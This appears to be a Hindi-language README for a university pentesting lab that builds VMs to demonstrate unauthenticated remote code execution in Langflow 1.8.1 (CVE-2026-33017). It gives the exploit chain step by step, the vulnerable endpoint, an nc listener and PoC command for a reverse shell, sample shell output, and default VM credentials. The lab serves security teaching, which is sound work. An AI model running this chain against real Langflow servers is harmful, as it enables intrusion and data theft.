
शैक्षिक लैब जो CVE-2026-33017 के माध्यम से Langflow में बिना प्रमाणीकरण के RCE प्रदर्शित करती है, जिसमें स्वचालित VM सेटअप और रिवर्स शेल के लिए PoC एक्सप्लॉइट शामिल है।
HoGent CyberSecurity II — नेटवर्क पेंटेस्टिंग और एक्सप्लॉइटेशन (NPE)
शैक्षणिक वर्ष 2025–2026
इस रिपॉजिटरी में CVE-2026-33017 के लिए एक पूर्ण लैब वातावरण और एक्सप्लॉइटेशन प्रदर्शन शामिल है, जो Langflow ≤ 1.8.1 में एक गंभीर अनप्रमाणित Remote Code Execution (RCE) भेद्यता है।
बिना किसी प्रमाणीकरण के एक हमलावर /api/v1/build_public_tmp/{flow_id}/flow एंडपॉइंट के माध्यम से सर्वर पर मनमाना Python कोड निष्पादित कर सकता है, क्योंकि उपयोगकर्ता इनपुट बिना सैंडबॉक्सिंग या सत्यापन के सीधे Python के exec() को दिया जाता है।
⚠️ अस्वीकरण: यह रिपॉजिटरी केवल नियंत्रित लैब वातावरण में शैक्षिक उद्देश्यों के लिए है। केवल उन सिस्टमों पर उपयोग करें जिनके लिए आपके पास स्पष्ट अनुमति है।
┌─────────────────────────────────────────────────────┐
│ HOST MACHINE │
│ │
│ ┌──────────────────┐ ┌───────────────────────┐ │
│ │ Langflow-Victim │ │ Kali-Attacker │ │
│ │ Ubuntu 22.04 │ │ Kali Linux │ │
│ │ 192.168.56.101 │◄────│ 192.168.56.100 │ │
│ │ Langflow 1.8.1 │ │ PoC exploit tool │ │
│ │ port 7860 │ │ + internet (NAT) │ │
│ └──────────────────┘ └───────────────────────┘ │
│ Host-only netwerk: 192.168.56.0/24 │
└─────────────────────────────────────────────────────┘
CVE-2026-33017/
├── README.md # यह फ़ाइल
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # पूर्ण डिप्लॉयमेंट और हमला गाइड
└── scripts/
├── setup_vms.sh # चरण 1: VirtualBox VMs बनाएं (HOST)
├── setup_victim.sh # चरण 2: Langflow 1.8.1 इंस्टॉल करें (Ubuntu VM)
└── setup_attacker.sh # चरण 3: PoC टूल इंस्टॉल करें (Kali VM)
VBoxManage के साथ VirtualBox 7.xUbuntu_22.04-VB-64bit.vdi → नाम बदलकर ubuntu-22.04.vdi करेंKali_Linux-VB-64bit.vdi → नाम बदलकर kali-linux.vdi करेंsetup_vms.sh के समान फ़ोल्डर में होंbash scripts/setup_vms.sh
# लॉगिन क्रेडेंशियल: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh
# लॉगिन क्रेडेंशियल: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh
टर्मिनल 1 — Reverse shell लिसनर:
nc -lvnp 4444
टर्मिनल 2 — एक्सप्लॉइट:
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
--lhost 192.168.56.100 --lport 4444
PoC स्वचालित रूप से
setup_attacker.shद्वारा इंस्टॉल किया जाता है।
उपयोग किया गया PoC: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC
| चरण | एंडपॉइंट | विवरण |
|---|---|---|
| 1 | GET /api/v1/auto_login | सुपरयूज़र JWT-टोकन प्राप्त करता है (AUTO_LOGIN=true) |
| 2 | POST /api/v1/flows/ | API के माध्यम से नया सार्वजनिक flow बनाता है |
| 3 | POST /api/v1/build_public_tmp/{id}/flow | दुर्भावनापूर्ण Python कोड के साथ CustomComponent इंजेक्ट करता है |
| 4 | exec() in validate.py:397 | कोड बिना सैंडबॉक्सिंग के निष्पादित होता है — RCE |
[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444
Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db
data पैरामीटर को हटाता हैLANGFLOW_AUTO_LOGIN बंद करेंHoGent — एप्लाइड इंफॉर्मेटिक्स — CyberSecurity II — 2025–2026